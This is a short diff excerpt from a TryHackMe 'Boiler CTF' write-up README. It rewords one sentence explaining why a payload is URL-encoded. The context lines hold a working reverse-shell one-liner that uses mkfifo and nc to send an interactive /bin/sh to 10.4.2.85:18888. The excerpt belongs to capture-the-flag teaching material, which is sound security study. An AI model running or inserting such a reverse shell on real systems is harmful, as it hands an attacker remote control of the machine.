austin-lai/TryHackMe-WriteUp/TryHackMe(THM)-Boiler CTF/README.md

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.2.85 18888 >/tmp/f
 ```

-Since, this is part of URL; to avoid bad interpretation of space or special character, we use URL encode to encode our payload
+As this is part of URL; to avoid bad interpretation of space or special character, we use URL encode to encode our payload

 ![10-1](img/10-1.png)